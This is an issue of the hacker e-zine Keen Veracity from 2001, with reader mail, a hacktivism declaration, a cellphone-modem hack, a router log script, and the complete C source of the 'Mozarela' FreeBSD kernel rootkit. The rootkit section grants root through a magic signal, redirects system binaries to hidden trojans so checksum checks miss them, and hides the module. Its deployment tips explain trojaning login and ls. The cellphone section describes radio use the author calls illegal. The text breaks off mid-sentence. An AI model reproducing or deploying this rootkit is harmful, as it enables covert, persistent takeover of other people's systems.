Copy Link
Add to Bookmark
Report
Keen Veracity Issue 11
--------------------------------------------------------------------------------
_ _ _ _ _
| | / ) | | | | (_)_
| | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _
| |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | |
| | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| |
|_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ |
(____/
--------------------------------------------------------------------------------
I S S U E (11) L e g i o n s o f t h e U n d e r g r o u n d
-------------------------------------------------[www.legions.org]--------------
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
W W W . L E G I O N S . O R G
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
[CONaENTS]------------------------------------------------------------[CONTENTS]
[1]==============================[Editorial - Digital Ebola <digi@legions.org> ]
[2]=====================================================[KV Spam - The Readers ]
[3]============================[Cell Shell - Morbid Angel <morbie@legions.org> ]
[4][Getting the most from a Linksys Cable/DSL Router - pr00f <pr00f@pr00f.org> ]
[5]=======================[Mozarela Kernal Trojan - arkmp <cippa@hobbiton.org> ]
[6]======[A Newbies Guide To Sockets in PERL - Beowulf <beowulf3@telocity.com> ]
[7]===[Curiosity killed the American Citizen - Firewa11 <firewa11@legions.org> ]
[8]========[Microsoft's OpenSource Policy - Our Elite Spy <submit@legions.org> ]
[9]=============[PERL Headache of the Issue - Digital Ebola <digi@legions.org> ]
[10]=========================[Fun with XOSD - Digital Ebola <digi@legions.org> ]
[11]=====================[More PERL Madness - Digital Ebola <digi@legions.org> ]
[12]==========[CISCO PIX Connection Monitoring - DataShark <nomad@legions.org> ]
[13]======================[Poor Man's Boards - BigGeezer <ddfelts@legions.org> ]
[14]=================================[YAPOTTLK - Lawless <lawless@legions.org> ]
[15]=================[I Got Windows, Now What? - Ntwak0 <adonis1@videotron.ca> ]
[16]=======[RIP - pr00f <pr00f@pr00f.org> / alkinoos <alkinoos@project802.net> ]
[17]=======================[Anti-Anti-Sniffer Patch - Vecna <vecna@s0ftpj.org> ]
[18]====================[The Wait (fiction) - Digital Ebola <digi@legions.org> ]
[19]========================================[Carolyn Does It Again - Anonymous ]
[20]==========================[Love's Freedom - Raschid <cogitoesum@yahoo.com> ]
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
W W W . L E G I O N S . O R G
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
[Editorial]======================================================[Digital Ebola]
Hello, and welcome to another late article of Keen Veracity. Oh, boy, is it
ever so late. Month and months in the making you could say. Ah well, you
know how it is, the economy these days, has no true friends. I was lucky,
I survived two layoffs at a dot com, and then got axed in the final blow (100
or so people went with me). I have most certainly been on my toes. I have
watched the jobs on the net dwindle down to almost nothing, and I am almost
kind of excited: the industry is reshaping itself. Not only reshaping, but
those annoying people who know dick about computers, network or security (I
refer to one person, and they know who they are) will see themselves ousted
for people that CAN do the work, for people that HAVE paid their dues. Not
even a writing career will save these pathetic know-nothings. And the ones
that are researching, reading, and creating, will be the ones that prosper.
Hopefully.
It is Midnight on July 12th, in this place I call home, on a nice little
street in a nice little suburb of Dallas. Right now, people are preparing
for Defcon. I am torn: I have just started a new job, as a Network Security
Analyst. I MAY make it to Defcon, then again I may not. If I don't, I will
next year, and I have attended the last two conferences. But I still have
this nagging feeling that I should go. I hate that. Hopefully, this edition
of KV will be finished BEFORE Defcon, and everyone may rejoice. And if I
make it to Vegas this year, you can harrass me about the tardiness. =)
I would like to dedicate this issue to several people:
Sierra - I don't know what to say, except RIP.
Texorcist - May you have the time of your life at Defcon, and I wish you the
best with your wedding.
DataShark - Erm.
Natasha - Hang in there. and try to relax!
Kris - *licks*
Lawless - Pika...Pika...
All of my former ER team. We survived!
And a very special thanks to the Legions crew, and to the contributors to
this issue of Keen Veracity. Now you guys can stop bugging me. =)
[KV Spam]==========================================================[The Readers]
Date: Thu, 5 Jul 2001 23:42:59 -0500
From: Dylan Brennan <arrow219@home.com>
To: submit@legions.org
Subject: where are u guys on irc?
where are u guys on irc?
/* We are cloaked. Actually, try Undernet #legions */
Date: Fri, 22 Jun 2001 21:18:26 +0200
From: Vladimir Dimitrijevic <vladabs@ptt.yu>
To: submit@legions.org
Dear Legions,
I'm Vladimir Dimitrijevic Graduated Electrical Engineer major: Computer
science from Serbia. I admire your work with a cracks and I pleased you
for help. Some political organization try to destroy my Internet cafe by
giving their service for free. I need some hack assistance from you to
stop them.
Thank you.
/* Well, we are TRYING to stay out of world affairs... */
Date: Wed, 13 Jun 2001 13:29:34 EDT
From: Lvthec@aol.com
To: submit@legions.org
Subject: Pearl Harbour Survivor Research
To whom this may concern,
I am doing research on survivors (doctors, nurses, patients, ect.)
that were in the hospitals on Dec. 7th and 8th. My goal is to try and talk
to some of the people. Do you know where I could find records of names that
served during that time period that would be open to the public? If you can
help me out or give me any suggestions to better assist me, it would be most
appreciated.
Stewart Flick
474-0501
/* www.google.com - DUH! */
Date: Sun, 27 May 2001 19:33:14 -0000
From: Omer Ýscimenler <iscomer@hotmail.com>
To: submit@legions.org
I'm a boy from Turkey and i really have a big desire to learn about these
things if you could just show me where to start or just give me some time
teach that would be great.I have a big intrest in computers and software and
i have a lot of time so if you could just tell me where to start i gurantee
you that i will become really good in a few years pls help me.
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
/* I didn't know you could get SPAM from Turkey... Uhh.. just keep reading
guy... You will get better. I promise. Don't read Microsoft stuff though,
read about UNIX... UNIX.. You want UNIX... */
Date: Sun, 13 May 2001 19:30:56 -0400
From: DORIS O'ROURKE <doris1@capital.net>
To: submit@legions.org
Subject: EMAIL
Will you give email addresses out for free or money? Thanks
/* For the right amount of money, sexual favors, or alcohol, many of us will
do almost ANYTHING. I haven't quite decided about email addresses tho. */
Date: Tue, 24 Apr 2001 20:14:25 +0200
From: Ronald Lemmers <fema@the-pentagon.com>
To: submit@legions.org
Subject: Worldonline...
Dear Members of Legions of the underground,
Recently worldonline www.worldonline.nl anounced that they have the best
secure mail servers of all Dutch providers...Immediately all people thought
they could say otherwise tried to hack there way into the
mailservers.....Because I know people who work there and got access to
internal information I asked them if someone allready gained access to one
of those email servers from worldonline....If I have to believe my friends
they say not a single soul gained access to the mail servers only the
aministrators =-) so that would be fun if you want to try it out.....and
test those good secure servers!
You can mail worldonline if they want a challenge....Winner gets
money....they like that kind of thingies you know...because I know the
people who work there have a big influence on the whole company
Greetz Rarekind!
/* uhhh... I trust people like that, dude */
Date: Sun, 11 Feb 2001 16:18:48 -0000
From: john michael vicente <john_michael_vicente@hotmail.com>
To: submit@legions.org
Subject: A NEWBIE WHO NEEDS HELP
Hi Legions!!!
I've just drop by your site and really want to be with.I know you are the
best computer geniuses in the whole wide web so I thought if you want to
help me to be like you. I admit that I am a newbie who really needs help
from u. Could you please suggests what references,books,sites do I have
to take because I dont know where to start. I what to know everything;
from programming to networking to security,things like that. In short, I
want to be like you guys. I hope you understand my situation because I
hate to be an ignorant geek.
Thanks a lot!!!
john michael
/* Why you mail us? Just go get some books! Use GOOGLE! =) */
Date: Mon, 12 Feb 2001 14:56:25 +0100
From: lars klei <lars@hetnet.nl>
To: submit@legions.org
can you help me get a hotmail password?
I don't know where to ask?
LARSKLEI@HOTMAIL.COM (THIS IS MY ACCOUNT)
/* No. We do not support Hotmail. Or ANY Microsoft product. */
Date: Wed, 07 Feb 2001 15:22:48 -0000
From: Brian Johnson <farah_o212@hotmail.com>
To: submit@legions.org
Subject: i need help
hi there,
I've been sending thounsands of e.mails to some hackers to help me to hack
some e.mail accounts ,but till now no one send me any reply...
i'm really depressed...
plz i need u to help me and send me an easy way to hack .. and please help
me and reply me soon and don't make me wait for nothing ok..
either send me an easy way with the instructions and it would be better if u
find a way without telling me send an e.mail to this and write....etc , or u
can help me and i'll send u the e.mail i want to hack..
waiting your reply
thanks
/* Read! Google! READ! GOOGLE! PROZAC! READ! GOOGLE! */
From: MtororojoS13@aol.com
To: submit@legions.org
Subject: I forgot to say!!!!
TOOLS IS THE BOBM!!!!!!!!!!!!!
.............................::::::::::::::::::::::::::::::::::::::::>>>>>>>>
D@rk Red Ph@ntom
/* Uhhhhhh.. Yeah. */
Date: Sat, 3 Feb 2001 08:10:32 -0800 (PST)
From: Osman Malik <cybermn9@yahoo.com>
To: submit@legions.org
Subject: RE:Leigons.org
i want to join your haking gruop hoiw do i ? my email
is cybermn9@yahoo.com
/* I always wanted to be a haker. */
Date: Wed, 24 Jan 2001 00:41:00 EST
From: Drkphantomangel@aol.com
To: submit@legions.org
Subject: qUiCk QuEsTiOn
would you mind if i but a link to your page on mine cuz i think your page
is
the shit . thanks DrKpHaNtOmAnGeL
/* Sure. Link all you want. */
Date: Thu, 18 Jan 2001 13:36:30 -0500
From: David Schiesl <cryptoeccentric@hotmail.com>
To: submit@legions.org
Subject: subscribe
/* Noooooooooo. I ain't no major dumb wh0re. */
Date: Sat, 30 Dec 2000 02:22:39 +0100
From: alex <unreal_Ad@yahoo.com>
To: submit@legions.org
Hi, Im a beginner hacker and i want to join your group, to learn more
about hacking...
U may have a use of me, cuz i can spend like 15 h with my comp and i
promise u i learn very quick..
I´ll do anything to join...
/* Anything? Would you read, graduate high school, and college? */
From: "[iso-8859-1] Jonas Lindström" <judge@myran.ac>
To: submit@legions.org
Subject: membership
hey how do i get a membership?
For Your Eyes Only
Mvh: Jonas
/* Pay me money. */
Date: Thu, 28 Dec 2000 04:41:23 -0500 (EST)
From: blackstone reche <blackstone@myself.com>
To: submit@legions.org
Subject: suscribe group
Hi, i'm Blackstone
i visited some of your hacked site i love how you break-in the rascist web
site i don't live people who whant white power
i'm black man and nothing can change this we are all the people the same and
.
bye +++++++++++++++++++++++++++++++
i speak french
but i know some english
/* I speak english, but I know some french... */
Date: Mon, 25 Dec 2000 14:19:43 -0500 (EST)
From: chris <zer0kewl@freenet.nether.net>
To: submit@legions.org
Subject: Joining
I have what it takes to be one of you and then some. Believe me when i
tell you that. I can take care of any thing you need done.
-Zer0kewL
/* Good. Start with my laundry, and then wash my car. */
Date: Thu, 5 Jul 2001 09:45:37 -0700 (PDT)
From: Grandmaster Ratte' <deadcow@cultdeadcow.com>
To: yermomma@cultdeadcow.com
Cc: /* Omitted, cause DAMN, thats alot of addresses */
Subject: cDc Msg Of Hope-July 4
_ _
((___)) cDc communications
[ x x ] & HACKTIVISMO
\ / "A Special Message of Hope"
(' ') July 4th, 2001
(U) FOR IMMEDIATE RELEASE
INTERNATIONAL BOOKBURNING IN PROGRESS
[July 4, 2001 - LUBBOCK, TX.] Free speech is under siege at the
margins of the Internet. Quite a few countries are censoring access
to the Web through DNS [Domain Name Service] filtering. This is a
process whereby politically incorrect information is blocked by
domain address -- the name that appears before the dot com suffix.
Others employ filtering which denies politically or socially
challenging subject matter based on its content.
Hacktivismo and the CULT OF THE DEAD COW have decided that enough
is too much. We are hackers and free speech advocates, and we are
developing technologies to challenge state-sponsored censorship of
the Internet.
Most countries use intimidation and filtering of one, kind or
another including the Peoples Republic of China, Cuba, and many
Islamic countries. Most claim to be blocking pornographic content.
But the real reason is to prevent challenging content from spreading
through repressive regimes. This includes information ranging from
political opinion, "foreign" news, women's issues, academic
and scholarly works, religious information, information
regarding ethnic groups in disfavor, news of human rights abuses,
documents which present drugs in a positive light, and gay and lesbian
content, among others.
The capriciousness of state-sanctioned censorship is wide-ranging. [1]
* In Zambia, the government has attempted to censor information
revealing their plans for constitutional referendums.
* In Mauritania -- as in most countries --, owners of cybercafes are
required to supply government intelligence agents with copies of e-mail
sent or received at their establishments.
* Even less draconian governments, like Malaysia, have threatened
web-publishers for violating their publishing licenses by publishing
frequent updates: _timely, relevant_ information is seen as a threat.
* South Korean's national security law forbids South Koreans from
having any contact -- including contact over the Internet -- with
their North Korean neighbors.
* Sri Lanka threatened news sites with possible revocation
of their licenses if coverage of a presidential election
campaign was not partial to the party of the outgoing president.
The risks of accessing or disseminating information are often great.
* In Ukraine, a decapitated body found near the village of Tarachtcha is
believed to be that of Georgiy Gongadze, founder and editor of an
on-line newspaper critical of the authorities.
* In August, 1998, eighteen year old Turk Emre Ersoz was found
guilty of "insulting the national police" in an Internet forum
after participating in a demonstration that was violently suppressed
by the police. His ISP provided the authorities with his address.
* Journalist Miroslav Filipovic has the dubious distinction of having
been the first Journalist accused of spying because of articles
published on the Internet -- in this case detailing the abuses of
certain Yugoslav army units in Kosovo.
We are sickened by these egregious violations of information and
human rights. The liberal democracies have talked a far better
game than they've played on access to information. But hackers
are not willing to watch the custodians of the International
Convention on Civil and Political Rights and the Universal
Declaration of Human Rights turn them into a mockery. We are
willing to put our money where our mouth is.
Hacktivismo and the CULT OF THE DEAD COW are issuing the HACKTIVISMO
DECLARATION as a declaration of outrage and a statement of intent.
It is our Magna Carta for information rights. People have a right
to reasonable access of otherwise lawfully published information.
If our leaders aren't prepared to defend the Internet, we are.
---------------------------------------------------------------------
[1] some information cited in this press release was either
paraphrased, or quoted directly, from the "Enemies of the Internet"
report published by Reporters Without Frontiers, and may be found
at http://www.rsf.fr
/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>
THE HACKTIVISMO DECLARATION
assertions of liberty in support of an uncensored internet
DEEPLY ALARMED that state-sponsored censorship of the Internet is
rapidly spreading with the assistance of transnational corporations,
TAKING AS A BASIS the principles and purposes enshrined in Article 19
of the Universal Declaration of Human Rights (UDHR) that states,
_Everyone has the right to freedom of opinion and expression; this
right includes freedom to hold opinions without interference and to
seek, receive and impart information and ideas through any media
and regardless of frontiers_, and Article 19 of the International
Covenant on Civil and Political Rights (ICCPR) that says,
1. Everyone shall have the right to hold opinions without interference.
2. Everyone shall have the right to freedom of expression; this right
shall include freedom to seek, receive and impart information and
ideas of all kinds, regardless of frontiers, either orally, in writing
or in print, in the form of art, or through any other media of his
choice.
3. The exercise of the rights provided for in paragraph 2 of this
article carries with it special duties and responsibilities. It may
therefore be subject to certain restrictions, but these shall only be
such as are provided by law and are necessary:
(a) For respect of the rights or reputations of others;
(b) For the protection of national security or of public order, or of
public health or morals.
RECALLING that some member states of the United Nations have signed the
ICCPR, or have ratified it in such a way as to prevent their citizens
from using it in courts of law,
CONSIDERING that, such member states continue to willfully suppress
wide-ranging access to lawfully published information on the Internet,
despite the clear language of the ICCPR that freedom of expression
exists in all media,
TAKING NOTE that transnational corporations continue to sell
information technologies to the world's most repressive regimes
knowing full well that they will be used to track and control an
already harried citizenry,
TAKING INTO ACCOUNT that the Internet is fast becoming a method of
repression rather than an instrument of liberation,
BEARING IN MIND that in some countries it is a crime to demand the
right to access lawfully published information, and of other basic human
rights,
RECALLING that member states of the United Nations have failed to press
the world's most egregious information rights violators to a higher
standard,
MINDFUL that denying access to information could lead to spiritual,
intellectual, and economic decline, the promotion of xenophobia and
destabilization of international order,
CONCERNED that governments and transnationals are colluding to maintain
the status quo,
DEEPLY ALARMED that world leaders have failed to address information
rights issues directly and without equivocation,
RECOGNIZING the importance to fight against human rights abuses with
respect to reasonable access to information on the Internet,
THEREFORE WE ARE CONVINCED that the international hacking community has
a moral imperative to act, and we
DECLARE:
* THAT FULL RESPECT FOR HUMAN RIGHTS AND FUNDAMENTAL FREEDOMS
INCLUDES THE LIBERTY OF FAIR AND REASONABLE ACCESS TO INFORMATION,
WHETHER BY SHORTWAVE RADIO, AIR MAIL, SIMPLE TELEPHONY, THE GLOBAL
INTERNET, OR OTHER MEDIA.
* THAT WE RECOGNIZE THE RIGHT OF GOVERNMENTS TO FORBID THE
PUBLICATION OF PROPERLY CATEGORIZED STATE SECRETS, CHILD PORNOGRAPHY,
AND MATTERS RELATED TO PERSONAL PRIVACY AND PRIVILEDGE, AMONG OTHER
ACCEPTED RESTRICTIONS. BUT WE OPPOSE THE USE OF STATE POWER TO CONTROL
ACCESS TO THE WORKS OF CRITICS, INTELLECTUALS, ARTISTS, OR RELIGIOUS
FIGURES.
* THAT STATE SPONSORED CENSORSHIP OF THE INTERNET ERODES PEACEFUL AND
CIVILIZED COEXISTENCE, AFFECTS THE EXERCISE OF DEMOCRACY, AND ENDANGERS
THE SOCIOECONOMIC DEVELOPMENT OF NATIONS.
* THAT STATE-SPONSORED CENSORSHIP OF THE INTERNET IS A SERIOUS FORM
OF ORGANIZED AND SYSTEMATIC VIOLENCE AGAINST CITIZENS, IS INTENDED TO
GENERATE CONFUSION AND XENOPHOPIA, AND IS A REPREHENSIBLE VIOLATION OF
TRUST.
* THAT WE WILL STUDY WAYS AND MEANS OF CIRCUMVENTING STATE SPONSORED
CENSORSHIP OF THE INTERNET AND WILL IMPLEMENT TECHNOLOGIES TO CHALLENGE
INFORMATION RIGHTS VIOLATIONS.
Issued July 4, 2001 by Hacktivismo and the CULT OF THE DEAD COW.
Relevant Web Links:
Universal Declaration of Human Rights
http://www.un.org/Overview/rights.html
International Covenant on Civil and Political Rights
http://www.unhchr.ch/html/menu3/b/a_ccpr.htm
Reporters Without Frontiers
http://www.rsf.fr
CULT OF THE DEAD COW
http://www.cultdeadcow.com
==
Media Contact:
Oxblood Ruffin
Foreign Minister
CULT OF THE DEAD COW
oxblood@cultdeadcow.com
http://cultdeadcow.com
__//////\ -cDc- CULT OF THE DEAD COW -cDc- /\\\\\\__
Est. 1984 \\\\\\/ NINJA STRIKE FORCE * HACKTIVISMO \//////
Est. 1984
####
We will have more to say.
/* We gotz your back, dead cow brothers. */
==============================================================================
Got a news story? Send it to editor@legions.org - We are working to put up
a semi cool news site, and it would be most excellent of each and every
one of you to send us news stories and links.
==============================================================================
[Cell Shell]======================================================[Morbie Angel]
This hasn't been fully tested (I've only tested the shell portion. It's
up to you to try out the PPP connection. In theory, it should work, but it's
going to be really slow.) And be forewarned, this is illegal. Everything you do
based on this is your choice, not mine. I am only supplying information, and I
am not responsible for your actions. If the FCC comes a knocking, don't be
bitching to me or LoU about your legal engagements. It is your fault if you get
caught doing any of the below in practice. Not mine.
The idea came to me a few months ago when I was in my friend's car,
wishing that I could nab a few files off my system when we were on the road.
It completely dawned on me a few minutes later when I was playing with my
Motorola 2800 bagphone. I had to find a way to make a network connection to my
main server back at my (old) house. And I figured cellular communication was
the way to go.
I went home later that day, and dug around my box full of (mostly)
various electronics and phone equipment. I found an old US Robotics 28.8 ext.
modem, RJ-11 -> Motorola TeleTAC adapter (For modems, duh.) and my old acoustic
coupler. I threw the external modem on my server, then ran some RJ11 to the
adapter, and connected the adapter to the TeleTAC. Whee.
Now, client side, I popped the coupler onto the 2800, then connected it
to my amazing 14.4 on the lappy. Now how the fuck did I establish the god damn
connection? This is going to be a bit lengthy, so let's list it out.
1) I edited my inittab (/etc/inittab) and added a dialup term. (You can find
it.)
2) Popped both cellphones into testmode. Nothing like FCN-00-**-83786633-STO.
Then I popped them onto an unused channel. And then (gasp) put them into Rx/Tx
mode by doing the following.
a) 08#
b) 10#
c) 05#
d) 353#
Oh my. I think we can hear ourselves talk over the channel. Isn't that special?
3) On the external modem, I threw a switch on it that said 'Auto Answer'. Now,
I realize this isn't on all Externals, and I should recommend that you find
one, wheter it's at a Goodwill, or a vintage computer store.
4) Started minicom on the laptop. And typed in the magical string, ATD.
Boom. That's all it took. I got an amazing 19.2 connection over the cellular
link. Now, could you get a higher connection with faster modems? No, dumb ass.
You can probably get a 28.8 connection, but it will most likely time out.
Now, unless you have some really old towers around your area that
actually forward channels through different towers (i.e. You're driving down
the road, and you're out of the original tower's range, then you switch over.)
you're going to get disconnected if you pass the limited range of your tower,
which is anywhere between 6 to 10 miles. There is only a couple ways around
that, but I'm sure you can figure them out within a few hours, minutes, or
seconds from now.
Okay, so you have yourself a cellular shell. Whoop dee doo. Now if you
can actually make a networked connection over the link, that would be nice, eh?
Well, using the wonderful PPP protocol, we can!
Add a new user on your host, name it whatever the fuck you want. Now,
for the shell, make sure it's /u sr/sbin/pppd. Make a new file in your favorite
editor called .ppprc and put it in the user's $home. Put the following in it.
connect
-detach
modem
crtscts
lock
:192.168.100.4
Whoop, there it is. Now on the client side, make a ppp script that logs in
as that user. And that's all she wrote. It should work, but I make no
guarantees whatsoever, since I never tested it.
So play around with it, if you dare. Mail me some followups, additions,
and so on also, I'd like to hear some new ideas to add to this simple project.
Next time, I'll get in depth with more wireless networking projects for your
geeky enjoyment.
[LinkSys DSL Router]=====================================================[pr00f]
A few months back I bought a 4-port Linksys cable/DSL router (model
BEFSR41) for a quick and easy way of sharing my broadband connection
between the boxen on my network. At the time I was more concerned with
reliability than I was feature set, and from past experience, I'd come
to know Linksys as a reliable vendor (up until recently, but we won't
get into that).
Anyway, a few weeks ago I was playing with the various settings on the
router and noticed the logging options. Now looking at the manual, I
couldn't find anything about this function. In fact, the screen shots
in the manual didn't even show the Log tab. Apparently they added the
logging functionality in a firmware update and I'd missed the change.
Looking on Linksys' web site didn't help any either. So I decided to do
some of my own research.
When you log into the router's web-based administration utility, you'll
see the Log tab second from the right. Clicking on it will give you a
couple options; enable/disable access logging and entering a local IP
address to send the log to. Without documentation this was going to be
interesting. So, I entered the IP address of one of my Linux boxen and
submitted the changes. I then asked a friend to telnet to me, just to
try and see what kind of activity the router would produce and send to
the box.
An SNMP trap is sent to the box. Logical enough. The trap contains the
direction of the traffic, either @in or @out, the IP address of the
source, and the IP address of the destination. Not exactly the most
useful logging feature in existence, but it'll do the trick for simple
monitoring of network activity to and from the Internet.
The next thing I did was setup snmptraplogd to capture the traps from
the router. This provided me a decent log of the day's events. I
proceeded to write a short PHP script to parse the log in real time,
providing a convenient way to monitor the logs.
Here's the PHP code I'm using:
--- BEGIN SNIP ---
<?
print("[ <A HREF=$PHP_SELF?filter=All>All</A> |");
print("<A HREF=$PHP_SELF?filter=Blocked>Blocked</A> |");
print("<A HREF=$PHP_SELF?filter=Incoming>Incoming</A> |");
print("<A HREF=$PHP_SELF?filter=Outgoing>Outgoing</A> ]\n");
print("<P>\n");
print("<B>$filter Traffic</B><BR>\n");
// Make sure the log is readable by Apache (usually www-data)
$filepointer = fopen("/var/log/snmptrapd.log", "r");
while (!feof($filepointer)) {
$fileline = fgets($filepointer, 1024);
if (strlen($fileline) > 0) {
$spaceloc = strpos($fileline, " ");
$timedate = substr($fileline, 0, $spaceloc);
$messageloc = strpos($fileline, "@");
if ($messageloc > 0) {
$message = substr($fileline, $messageloc,strlen($fileline) - $messageloc - 3);
$year = substr($timedate, 0, 4);
$month = substr($timedate, 4, 2);
$day = substr($timedate, 6, 2);
$hour = substr($timedate, 9, 2);
$minute = substr($timedate, 11, 2);
$second = substr($timedate, 13);
$date = "$month/$day/$year";
$time = "$hour:$minute:$second";
$type = substr($message, 0, 2);
if (strlen($filter) == 0)
$filter = "All";
if ($filter == "All") {
$parts = explode(" ", $message);
print("$date $time - $parts[1]:$parts[2] >$parts[3]:$parts[4]<BR>\n");
}
elseif ($filter == "Incoming") {
if ($type == "@i") {
$parts = explode(" ", $message);
if ($parts[3] != "router")
print("$date $time - $parts[1]:$parts[2] >$parts[3]:$parts[4]<BR>\n");
}
}
elseif ($filter == "Outgoing") {
if ($type == "@o") {
$parts = explode(" ", $message);
print("$date $time - $parts[1]:$parts[2] >$parts[3]:$parts[4]<BR>\n");
}
}
elseif ($filter == "Blocked") {
if ($type == "@i") {
$parts = explode(" ", $message);
if ($parts[3] == "24.x.x.x") // CHANGE THIS -- It
should be your router's external IP address
print("$date $time - $parts[1]:$parts[2] >router:$parts[4]<BR>\n");
}
}
}
}
}
fclose($filepointer);
?>
--- END SNIP ---
[Mozarela Kernal Trojan]=================================================[arkmp]
-- M O Z A R E L A K E R N E L T R O J A N --
-- for FreeBSD 4.x --
hi, other info about kernel loadable under freebsd can be found at
http://www.thehackerschoice.com on the Pragmatic's tutorial.
Usually we see linux rootkit placed on kernel module, but for freebsd 4.x
isn't ever coded nothing.
This code (after the code you may find some explanation) is a simple
freebsd
rootkit named "mozarela" with some functions.
------------------------------------------------- cut here -----------
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/malloc.h>
#include <sys/syscall.h>
#include <sys/sysent.h>
#include <sys/sysproto.h>
#include <sys/linker.h>
#include <sys/systm.h>
/*
* $mozarela coded 26/01/2001 - some parts of code and ideas are from
* vecna@s0ftpj.org and him "spapem" (anti securelevel project)
* http://www.s0ftpj.org some info are from "Attacking FreeBSD with kernel
* modules" by Pragmatic (THC) http://www.thehackerschoice.com
*/
#define MOD_NAME "mozarela.ko"
struct couple
{
char oldexec[32];
char newexec[32];
};
static int super_power, mozarela_warn;
static void check_dirname(struct proc *, char *, int);
static int
mozarela_chdir(struct proc *p, struct chdir_args *uap)
{
check_dirname(p, uap->path, strlen(uap->path));
return chdir(p, uap);
}
static int
mozarela_kill(struct proc *p, struct kill_args *uap)
{
if(super_power && uap->signum == 31)
{
struct proc *magic;
if(!(magic =pfind(uap->pid)))
return ESRCH;
else
{
magic->p_cred->pc_ucred->cr_uid =0;
magic->p_cred->p_ruid =0;
magic->p_cred->p_svuid =0;
magic->p_cred->p_rgid =0;
magic->p_cred->p_svuid =0;
super_power =0;
return(0);
}
}
else
return kill(p, uap);
}
static int
mozarela_execve(struct proc *p, struct execve_args *uap)
{
if(uap->fname !=NULL)
{
static struct couple execred[3] =
{
{ "/bin/ls","/dev/a" },
{ "/bin/su","/dev/b" },
{ "/bin/rm","/dev/c" }
/*
* READ READ READ READ article before ANY CHANGE - if you put
* the second name bigger than first you may cause kernel panic
*/
};
int size =sizeof(execred) / sizeof(struct couple);
while(size >= 0)
{
if(!strcmp(execred[--size].oldexec, uap->fname))
{
memcpy(uap->fname, &execred[size].newexec,
sizeof(execred[size].newexec));
uap->fname[sizeof(execred[size].newexec)+1]=0;
}
}
}
return execve(p, uap);
}
static int
mozarela_kldstat(struct proc *p, struct kldstat_args *uap)
{
int ret = kldstat(p, uap);
if(!ret && uap->stat->name !=NULL)
if(!strcmp(uap->stat->name, MOD_NAME))
mozarela_warn =p->p_pid;
return ret;
}
static int
mozarela_write(struct proc *p, struct write_args *uap)
{
if(mozarela_warn && mozarela_warn == p->p_pid)
mozarela_warn =uap->nbyte =0;
return write(p, uap);
}
static struct sysent mozarela[5] =
{
{ 1, (sy_call_t *) mozarela_chdir },
{ 2, (sy_call_t *) mozarela_kill },
{ 3, (sy_call_t *) mozarela_execve },
{ 3, (sy_call_t *) mozarela_write },
{ 2, (sy_call_t *) mozarela_kldstat }
};
static int init_module(module_t mod, int cmd, void *arg)
{
int ret = 0;
switch (cmd)
{
case MOD_LOAD:
sysent[SYS_chdir] =mozarela[0];
sysent[SYS_kill] =mozarela[1];
sysent[SYS_execve] =mozarela[2];
sysent[SYS_write] =mozarela[3];
sysent[SYS_kldstat] =mozarela[4];
uprintf("mozarela loadated\n");
break;
case MOD_UNLOAD:
sysent[SYS_chdir].sy_call =(sy_call_t *)chdir;
sysent[SYS_kill].sy_call =(sy_call_t *)kill;
sysent[SYS_execve].sy_call =(sy_call_t *)execve;
sysent[SYS_write].sy_call =(sy_call_t *)write;
sysent[SYS_kldstat].sy_call =(sy_call_t *)kldstat;
break;
default:
ret = EINVAL;
break;
}
return(ret);
}
static struct moduledata mozarela_moddata =
{
"mozarela",
init_module,
NULL
};
DECLARE_MODULE(syscall, mozarela_moddata, SI_SUB_DRIVERS,
SI_ORDER_MIDDLE);
static void check_dirname(struct proc *p, char *dir, int len)
{
if(len != 3)
return;
/*
* "cd \*CC" can activate kill trojan
*/
if(dir[0] == '*' && dir[1] == 'C' && dir[2] == 'C')
super_power++;
}
------------------------------------------------- cut here -----------
on this code we can find redirection of this system call:
chdir
kill
execve
write
kldstat
sometime chdir is used for change working directory, kill for send signal
to a process, execve for execute executable file, write for any writing
procedure (file socket standard output ...) kldstat to see started
module.
this kld have this special abilities:
1) change uid/gid/euid/egid to root to specificated process.
2) make exec redirection, you may put some troian under
/usr/share/man9/CVS/
or other directory and redir execution ... example ... if you want
execute your login troian usually copy your troian over /bin/login, but
a checksum checker can discover it (because the md5sum of file is been
changed) with this system you may put new binary and execute this also
keeping original binary file :)
3) make hiding self.
other implementation if think that are superflue, because with execve
redir
you may truly make anything... if you want hide your files i can
code redirection of getdirentries(2) or getdents(2) but is more easy and
lower dangerous put you ls trojan and redir execution, some for login, w,
netstat and others, on /usr/src/ you may find all freebsd source is very
simple change it for various pourpose :)
-- L I T T L E K L D I N F O --
The kld can modify ANY block of kernel, btw sometimes kld redir syscall or
cdevsw functions, or other simple pointer to function on linked file.
If you want make an idea with ALL syscall that you can redir, you can see
/usr/src/sys/sys/syscall.h, you can search how system call is used whit
/usr/share/man/man2/* man pages and with utility ktrace and kdump you
may find how syscall is used under program (if you don't want grep on the
code or if code use a wrapper) with
# ktrace ./code args args
# kdump | more
and read all system call used during execution.
i don't explain internals of coding at kernel space under freebsd, but any
system call can be redirect as function pointer, as argument any system
call
take:
function_name(struct proc *, struct [system_call_name]_args *);
on [system_call_name]_args you may find the argument passed from
userspace...
eg. kill(2) have prototipe as: kill(int, int); kill_args struct is a
struct
with 2 int declared inside.
usually for find the original code I use
grep [system_call_name]_args /usr/src/sys/kern/*.c
this info can help you on the comprension of kld functions, you may find
on
the kernel source any other question, if you want hack this simple kld
only
two or three houres to hack can resolve your problem, if you wannabe a
kernel
